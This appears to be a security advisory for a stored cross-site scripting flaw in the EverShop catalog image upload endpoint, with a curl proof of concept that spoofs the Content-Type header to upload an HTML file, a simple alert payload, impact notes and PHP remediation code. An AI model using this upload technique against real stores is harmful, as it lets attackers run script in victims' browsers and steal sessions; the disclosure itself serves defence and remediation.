Share
## https://sploitus.com/exploit?id=5105E4EC-12F2-5777-8E75-A3DF306D1800
# Security Vulnerability Disclosure โ€“ Stored XSS via File Upload in EverShop

## Overview

**Vulnerability Type:** Stored Cross-Site Scripting (XSS)  
**Severity:** High (CVSS 3.1: 7.4)  
**CVSS Vector:** `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N`  
**Affected Component:** File Upload Endpoint  
**Disclosure Date:** April 18, 2026  
**Reporter:** Venukamatchi P

---

## Vulnerability Description

The EverShop application allows uploading files through the catalog images endpoint. The server validates file types based solely on the user-controlled `Content-Type` header, which can be easily spoofed by an attacker. This allows uploading malicious HTML files while masquerading them as images.

### Affected Endpoint

```
POST /api/images/catalog/{id}/{id}
```

### Root Cause

1. **Trusting user-controlled Content-Type header** - No server-side validation of actual file content
2. **Lack of file extension validation** - Extensions are not verified against allowed types
3. **Unsafe file serving** - Uploaded files are served without proper sanitization or content-type restrictions
4. **Missing security headers** - No Content-Disposition or CSP headers to mitigate execution

---

## Proof of Concept

### Step 1: Upload Malicious File

```bash
curl -X POST "http:///api/images/catalog/7333/1221" \
  -H "Cookie: " \
  -F "images=@xss.html;type=image/jpeg"
```

### Step 2: Malicious Payload (`xss.html`)

```html
alert('XSS')
```

### Step 3: Access Uploaded File

The file becomes publicly accessible at:

```
http:///assets/catalog/7333/1221/xss.html
```

When a victim visits this URL, the JavaScript executes in their browser context.

**PIC:**



---

## Impact

| Impact | Severity |
|--------|----------|
| Execution of arbitrary JavaScript in victim's browser | High |
| Session hijacking via cookie theft | High |
| User account compromise | High |
| Potential for chaining with other vulnerabilities (e.g., RCE) | Critical |

### Attack Scenarios

1. **Session Hijacking:** Attacker steals admin session cookies to gain unauthorized access
2. **Phishing:** Inject fake login forms to capture credentials
3. **Defacement:** Modify page content to display malicious messages
4. **Malware Distribution:** Redirect users to malware download sites
5. **Privilege Escalation:** Chain with other vulnerabilities for full system compromise

---

## Remediation Recommendations

### Immediate Actions

1. **Validate File Content (Magic Bytes)**
   ```php
   // Example: Check actual file content, not just headers
   $allowedMimeTypes = ['image/jpeg', 'image/png', 'image/gif'];
   $finfo = new finfo(FILEINFO_MIME_TYPE);
   $mimeType = $finfo->file($_FILES['images']['tmp_name']);
   
   if (!in_array($mimeType, $allowedMimeTypes)) {
       throw new Exception('Invalid file type');
   }
   ```

2. **Restrict Allowed Extensions**
   ```php
   $allowedExtensions = ['jpg', 'jpeg', 'png', 'gif'];
   $extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
   
   if (!in_array($extension, $allowedExtensions)) {
       throw new Exception('Extension not allowed');
   }
   ```

3. **Block Dangerous File Types**
   - Explicitly block `.html`, `.htm`, `.svg`, `.js`, `.php`, `.exe` extensions
   - Maintain a whitelist of allowed types (never use blacklists)

4. **Serve Files Safely**
   ```php
   // Force download or set safe content-type
   header('Content-Disposition: attachment; filename="' . $filename . '"');
   header('Content-Type: application/octet-stream');
   ```

5. **Implement Content Security Policy (CSP)**
   ```
   Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
   ```

### Long-Term Improvements

- Store uploaded files outside the web root and serve via proxy
- Implement file scanning for malicious content
- Add rate limiting on upload endpoints
- Log and monitor suspicious upload attempts
- Conduct regular security audits of file handling code

---

## Disclosure Timeline

| Date | Event |
|------|-------|
| April 18, 2026, 8:38 PM | Initial vulnerability report sent to EverShop support |
| April 18, 2026, 9:44 PM | CVSS severity and vector provided |
| May 2, 2026, 7:46 PM | Follow-up inquiry sent for status update |
| Pending | Awaiting vendor response and remediation |

---

## Contact

**Reporter:** Venukamatchi P  
For questions or additional information regarding this disclosure, please contact the reporter directly.

---

## References

- [OWASP File Upload Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html)
- [OWASP Stored XSS Prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
- [CVSS v3.1 Specification](https://www.first.org/cvss/specification-document)
- [Content Security Policy (CSP) Guide](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)

---

*This document is provided for educational and remediation purposes only. Unauthorized exploitation of this vulnerability is illegal and unethical.*